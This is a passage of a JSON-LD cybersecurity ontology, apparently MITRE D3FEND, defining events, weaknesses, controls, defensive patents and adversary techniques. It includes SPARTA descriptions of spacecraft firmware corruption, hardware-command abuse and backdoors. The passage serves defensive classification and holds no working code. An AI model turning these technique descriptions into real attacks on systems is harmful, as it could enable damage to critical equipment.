        "Information Exchange Mapping"
      ],
      "rdfs:label": "Data Exchange Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:N9c39b13c4a194ea3916b0512b1dc5f96"
        }
      ]
    },
    {
      "@id": "_:N9c39b13c4a194ea3916b0512b1dc5f96",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DataDependency"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForValidatingIn-memoryIntegrityOfExecutableFilesToIdentifyMaliciousActivity_EndgameInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190018962A1/en?oq=15648887"
      },
      "d3f:kb-abstract": "In the embodiments described herein, a malicious code detection module identifies potentially malicious instructions in volatile memory of a computing device before the instructions are executed. The malicious code detection module identifies an executable file, such as an .exe file, in memory, validates one or more components of the executable file against the same file stored in non-volatile storage, and issues an alert if the validation fails.",
      "d3f:kb-author": "Joseph W. Desimone",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "System and method for validating in-memory integrity of executable files to identify malicious activity",
      "rdfs:label": "Reference - System and method for validating in-memory integrity of executable files to identify malicious activity - Endgame Inc"
    },
    {
      "@id": "d3f:CACertificateFile",
      "@type": "owl:Class",
      "d3f:definition": "A file containing a digital certificate issued by a certificate authority (CA).  Certificate authorities store, issue, and sign digital certificates used as part of the public key infrastructure.",
      "rdfs:label": "CA Certificate File",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Certificate_authority"
        },
        {
          "@id": "dbr:Public_key_infrastructure"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "d3f:DocumentFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A document is a written, drawn, presented or recorded representation of thoughts. An electronic document file is usually used to describe a primarily textual file, along with its structure and design, such as fonts, colors and additional images.",
      "d3f:may-contain": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Document File",
      "rdfs:seeAlso": {
        "@id": "dbr:Document"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N74451909868140579892ffa5cfdfe1f4"
        }
      ]
    },
    {
      "@id": "_:N74451909868140579892ffa5cfdfe1f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:EventLogStopEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating that the event logging service has been stopped, halting the recording of system events.",
      "rdfs:label": "Event Log Stop Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EventLogEvent"
        },
        {
          "@id": "_:N32ef41ac97894e1dba4996221b8efde6"
        }
      ]
    },
    {
      "@id": "_:N32ef41ac97894e1dba4996221b8efde6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLogStartEvent"
      }
    },
    {
      "@id": "d3f:HardwareTimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "A timer event involving a physical timer mechanism implemented in hardware components.",
      "rdfs:label": "Hardware Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TimerEvent"
        },
        {
          "@id": "_:Nb1c60fabe3aa4ed78111d5b354cfdce6"
        }
      ]
    },
    {
      "@id": "_:Nb1c60fabe3aa4ed78111d5b354cfdce6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareTimer"
      }
    },
    {
      "@id": "d3f:EX-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0005",
      "d3f:definition": "The adversary achieves execution or effect by corrupting or steering behavior beneath the software stack, in device firmware, programmable logic, or the hardware itself. Examples include tampering with firmware images or configuration blobs burned into non-volatile memory; targeting MCU/SoC boot ROM fallbacks; editing FPGA bitstreams or partial-reconfiguration frames; or leveraging physical phenomena and timing to flip bits or skip checks. Because these actions occur below or alongside the operating system and application FSW, traditional endpoint safeguards see normal interfaces while trust anchors are already altered.",
      "rdfs:label": "Exploit Hardware/Firmware Corruption - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Exploit Hardware/Firmware Corruption"
    },
    {
      "@id": "d3f:EX-0005.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0005.02",
      "d3f:definition": "Threat actors may issue low-level device or maintenance commands that act directly on hardware, bypassing much of the high-level command mediation. These may be memory-mapped register writes forwarded over the bus, vendor-specific instrument/control opcodes, built-in-test and calibration modes, boot-mode or fuse-programming sequences, file/sector operations to on-board non-volatile stores, or actuator primitives for wheels, thrusters, motors, heaters, and RF chains. Because these interfaces exist to configure sensors, zero momentum, switch power domains, tune gains, or adjust clocks, they can also be sequenced to produce harmful effects: over-driving mechanisms, altering persistent calibration, disabling watchdogs, or switching timing sources. Some hardware command sets are only exposed in maintenance or contingency modes, while others are always reachable through gateway processors that translate high-level telecommands into device-level operations. By crafting orders that respect expected framing and rate/size limits, the adversary can induce mechanical, electrical, or logical state changes with immediate, high-privilege impact, all while appearing to exercise legitimate device capabilities.",
      "d3f:produces": {
        "@id": "d3f:OTModifyDeviceConfigurationCommand"
      },
      "rdfs:label": "Malicious Use of Hardware Commands - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0005/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0005"
        },
        {
          "@id": "_:Nf097055861cb4079a59e1b9b18575887"
        }
      ],
      "skos:prefLabel": "Malicious Use of Hardware Commands"
    },
    {
      "@id": "_:Nf097055861cb4079a59e1b9b18575887",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:CWE-345",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-345",
      "d3f:definition": "The product does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.",
      "rdfs:label": "Insufficient Verification of Data Authenticity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:Reference-StreamingPhish",
      "@type": [
        "owl:NamedIndividual",
        "d3f:TechniqueReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://github.com/wesleyraptor/streamingphish"
      },
      "d3f:kb-abstract": "This is a utility that uses supervised machine learning to detect phishing domains from the Certificate Transparency log network.",
      "d3f:kb-author": "Wes Connell",
      "d3f:kb-organization": "Uber",
      "d3f:kb-reference-of": {
        "@id": "d3f:PassiveCertificateAnalysis"
      },
      "d3f:kb-reference-title": "StreamingPhish",
      "rdfs:label": "Reference - StreamingPhish"
    },
    {
      "@id": "d3f:DNSQueryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DNS query is made to resolve a domain name.",
      "rdfs:label": "DNS Query Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DNSEvent"
      }
    },
    {
      "@id": "d3f:Reference-ModificationOfAServerToMimicADeceptionMechanism_AcalvioTechnologiesInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170149825A1"
      },
      "d3f:kb-abstract": "Provided are devices, computer-program products, and methods (e.g., methods implemented by a production system or security agent program or process) for providing services on a production system to mimic a deception mechanism. For example, a method can include determining a deception characteristic of a deception mechanism and determining a production characteristic of the production system. The method can further include determining an additional service or a modification of an existing service of the production system using the deception characteristic and the production characteristic. In some cases, the additional service and/or the modification can be a deterrent to potential attackers of the production system. The method can further include modifying the production system to mimic the deception mechanism, including adding the additional service to the production system or modifying the existing service using the modification.",
      "d3f:kb-author": "Sreenivas Gukal, Rammohan Varadarajan",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Acalvio Technologies Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ConnectedHoneynet"
      },
      "d3f:kb-reference-title": "Modification of a Server to Mimic a Deception Mechanism",
      "rdfs:label": "Reference - Modification of a Server to Mimic a Deception Mechanism - Acalvio Technologies Inc"
    },
    {
      "@id": "d3f:TA0034",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Impact - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:T1059",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1059",
      "d3f:definition": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
      "d3f:executes": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Command and Scripting Interpreter",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N5054bc1035e443c08c641eb1f89dcf89"
        }
      ]
    },
    {
      "@id": "_:N5054bc1035e443c08c641eb1f89dcf89",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-01-009%3ADetectingShadowCopyDeletionViaVssadmin.exe_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-01-009/"
      },
      "d3f:kb-abstract": "After compromising a network of systems, threat actors often try to delete Shadow Copy in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. This non-detection of this technique, which is often employed by ransomware strains such as “Olympic Destroyer”, may lead to a failure in recovering systems after an attack.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe",
      "rdfs:label": "Reference - CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe - MITRE"
    },
    {
      "@id": "d3f:FTPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the File Transfer Protocol (FTP), a standard network protocol used to transfer files between a client and server over a TCP/IP network. FTP facilitates operations such as file uploads, downloads, directory listing, and remote file management.",
      "rdfs:label": "FTP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/ftp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:Nd3d0d3f139374c41b5cba9df4c67899c"
        }
      ]
    },
    {
      "@id": "_:Nd3d0d3f139374c41b5cba9df4c67899c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileTransferNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001774_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs a deny-all, permit-by-exception policy to allow the execution of authorized software programs on the information system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001774"
    },
    {
      "@id": "d3f:GetScreenCapture",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Get Screen Capture",
      "rdfs:subClassOf": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:MemoryAllocationFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reserves memory for a running process to use.",
      "d3f:invokes": {
        "@id": "d3f:AllocateMemory"
      },
      "rdfs:label": "Memory Allocation Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N73fdb79d991d4ad1aec9d69caa2bc02a"
        }
      ]
    },
    {
      "@id": "_:N73fdb79d991d4ad1aec9d69caa2bc02a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AllocateMemory"
      }
    },
    {
      "@id": "d3f:Matching",
      "@type": "owl:Class",
      "rdfs:label": "Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:PER-0002",
      "@type": "owl:Class",
      "d3f:attack-id": "PER-0002",
      "d3f:definition": "A backdoor is a covert access path that bypasses normal authentication, authorization, or operational checks so the attacker can reenter the system on demand. Backdoors may be preexisting (undocumented service modes, maintenance accounts, debug features) or introduced by the adversary during development, integration, or on-orbit updates. Triggers range from “magic” opcodes and timetags to specific geometry/time conditions, counters, or data patterns embedded in routine traffic. The access they provide varies from expanded command sets and relaxed rate/size limits to alternate communications profiles and hidden file/parameter interfaces. Well-crafted backdoors blend with nominal behavior, appearing as ordinary operations while quietly accepting instructions that other paths would reject, thereby sustaining the attacker’s foothold across passes, resets, and operator handovers.",
      "rdfs:label": "Backdoor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0002/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAPersistenceTechnique"
      },
      "skos:prefLabel": "Backdoor"
    },
    {
      "@id": "d3f:CWE-341",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-341",
      "d3f:definition": "A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc.",
      "rdfs:label": "Predictable from Observable State",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-340"
      }
    },
    {
      "@id": "d3f:T0828",
      "@type": "owl:Class",
      "d3f:attack-id": "T0828",
      "d3f:definition": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments.",
      "rdfs:label": "Loss of Productivity and Revenue - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Productivity and Revenue"
    },
    {
      "@id": "d3f:modified",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date on which the resource was changed.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date modified"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:CWE-828",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-828",
      "d3f:definition": "The product defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted.",
      "rdfs:label": "Signal Handler with Functionality that is not Asynchronous-Safe",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-364"
      }
    },
    {
      "@id": "d3f:Metadata",
      "@type": "owl:Class",
      "d3f:definition": "Metadata is information which describes aspects of other information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Metadata"
      },
      "rdfs:label": "Metadata",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/metadata"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:Exec",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:executes": {
        "@id": "d3f:ExecutableBinary"
      },
      "rdfs:label": "Exec",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Exec"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N3c298de1e65a4f85a479eb545989f6b8"
        }
      ]
    },
    {
      "@id": "_:N3c298de1e65a4f85a479eb545989f6b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:OTReadTimeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read timing mechanisms.",
      "rdfs:label": "OT Read Time Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTTimeCommandEvent"
        },
        {
          "@id": "_:N6250b0c8be2745898a40dd3a926566ed"
        }
      ]
    },
    {
      "@id": "_:N6250b0c8be2745898a40dd3a926566ed",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadTimeCommand"
      }
    },
    {
      "@id": "d3f:T0837",
      "@type": "owl:Class",
      "d3f:attack-id": "T0837",
      "d3f:definition": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel.",
      "rdfs:label": "Loss of Protection - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Loss of Protection"
    },
    {
      "@id": "d3f:AML.T0035",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0035",
      "d3f:definition": "Adversaries may collect AI artifacts for [Exfiltration](/tactics/AML.TA0010) or for use in [AI Attack Staging](/tactics/AML.TA0001).\nAI artifacts include models and datasets as well as other telemetry data produced when interacting with a model.",
      "rdfs:label": "AI Artifact Collection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0035"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "AI Artifact Collection"
    },
    {
      "@id": "d3f:IA-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005.01",
      "d3f:definition": "With a local vantage point, an adversary analyzes unintentional emissions to infer sensitive information. Crypto modules, command decoders, and main bus controllers can emit patterns correlated with key use, counter updates, or command parsing. Close-range sampling enables coherent averaging, directional sensing, and correlation against known command/telemetry sequences to separate signal from noise. If the emanations are information-bearing (e.g., side-channel leakage of keys, counters, or protocol state), they can be used to reconstruct authentication material, predict anti-replay windows, or derive decoder settings, providing a basis for initial access via crafted traffic.",
      "rdfs:label": "Compromise Emanations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0005"
      },
      "skos:prefLabel": "Compromise Emanations"
    },
    {
      "@id": "d3f:FTPPutEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is uploaded from a client to an FTP server, transferring data from the local system to the remote destination.",
      "rdfs:label": "FTP Put Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FTPEvent"
      }
    },
    {
      "@id": "d3f:AML.T0011",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0011",
      "d3f:definition": "An adversary may rely upon specific actions by a user in order to gain execution.\nUsers may inadvertently execute unsafe code introduced via [AI Supply Chain Compromise](/techniques/AML.T0010).\nUsers may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.",
      "rdfs:label": "User Execution - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0011"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExecutionTechnique"
      },
      "skos:prefLabel": "User Execution"
    },
    {
      "@id": "d3f:CCI-001452_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces the organization-defined time period during which the limit of consecutive invalid access attempts by a user is counted.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-25T00:00:00"
      },
      "rdfs:label": "CCI-001452"
    },
    {
      "@id": "d3f:ApplicationConfigurationDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database record holding information used to configure the parameters and initial settings for an application.",
      "rdfs:label": "Application Configuration Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationConfiguration"
        },
        {
          "@id": "d3f:ConfigurationDatabaseRecord"
        }
      ]
    },
    {
      "@id": "d3f:OTPauseCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to pause a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Pause Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N78ebe9ae1e784f97ab46105d0de47781"
        }
      ]
    },
    {
      "@id": "_:N78ebe9ae1e784f97ab46105d0de47781",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:ATTACKMobileCommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0037"
      },
      "rdfs:label": "Command and Control Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N2f9a4e2c127844ea92512093ea9a2cb9"
        }
      ],
      "skos:prefLabel": "Command and Control Technique"
    },
    {
      "@id": "_:N2f9a4e2c127844ea92512093ea9a2cb9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0037"
      }
    },
    {
      "@id": "d3f:T1454",
      "@type": "owl:Class",
      "d3f:attack-id": "T1454",
      "d3f:definition": "Test",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by",
      "rdfs:label": "Malicious SMS Message - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Malicious SMS Message"
    },
    {
      "@id": "d3f:CCI-001211_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, at organization-defined information system components, loads and executes organization-defined applications from hardware-enforced, read-only media.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001211"
    },
    {
      "@id": "d3f:T1570",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1570",
      "d3f:definition": "Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.",
      "d3f:produces": {
        "@id": "d3f:IntranetFileTransferTraffic"
      },
      "rdfs:label": "Lateral Tool Transfer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N0a5785926c1d41f1b6b1bc077774f032"
        }
      ]
    },
    {
      "@id": "_:N0a5785926c1d41f1b6b1bc077774f032",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetFileTransferTraffic"
      }
    },
    {
      "@id": "d3f:Reference-ApproachesForSecuringAnInternetEndpointUsingFine-grainedOperatingSystemVirtualization_Bromium,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20110296412A1"
      },
      "d3f:kb-abstract": "Approaches for executing untrusted software on a client without compromising the client using micro-virtualization to execute untrusted software in isolated contexts. A template for instantiating a virtual machine on a client is identified in response to receiving a request to execute an application. After the template is identified, without human intervention, a virtual machine is instantiated, using the template, in which the application is to be executed. The template may be selected from a plurality of templates based on the nature of the request, as each template describe characteristics of a virtual machine suitable for a different type of activity. Selected resources such as files are displayed to the virtual machines according to user and organization policies and controls. When the client determines that the application has ceased to execute, the client ceases execution of the virtual machine without human intervention.",
      "d3f:kb-author": "Gaurav Banga, Ian Pratt, Kiran Bondalapati, Vikram Kapoor",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bromium, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:Hardware-basedProcessIsolation"
      },
      "d3f:kb-reference-title": "Approaches for securing an internet endpoint using fine-grained operating system virtualization",
      "rdfs:label": "Reference - Approaches for securing an internet endpoint using fine-grained operating system virtualization - Bromium, Inc."
    },
    {
      "@id": "d3f:CWE-1099",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1099",
      "d3f:definition": "The product's code, documentation, or other artifacts do not consistently use the same naming conventions for variables, callables, groups of related callables, I/O capabilities, data types, file names, or similar types of elements.",
      "rdfs:label": "Inconsistent Naming Conventions for Identifiers",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:CWE-116",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-116",
      "d3f:definition": "The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.",
      "d3f:synonym": [
        "Output Encoding",
        "Output Sanitization",
        "Output Validation"
      ],
      "rdfs:label": "Improper Encoding or Escaping of Output",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:T1053.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1053.006",
      "d3f:definition": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)",
      "rdfs:label": "Systemd Timers",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:CCI-001089_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements security functions as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001089"
    },
    {
      "@id": "d3f:CWE-647",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-647",
      "d3f:definition": "The product defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization.",
      "rdfs:label": "Use of Non-Canonical URL Paths for Authorization Decisions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-863"
      }
    },
    {
      "@id": "d3f:OTRunCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
